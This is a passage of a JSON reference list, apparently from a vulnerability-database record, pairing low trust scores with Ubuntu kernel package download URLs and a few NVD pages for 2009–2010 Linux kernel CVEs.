        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0007"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4031"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.59_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.dsc"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4138"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
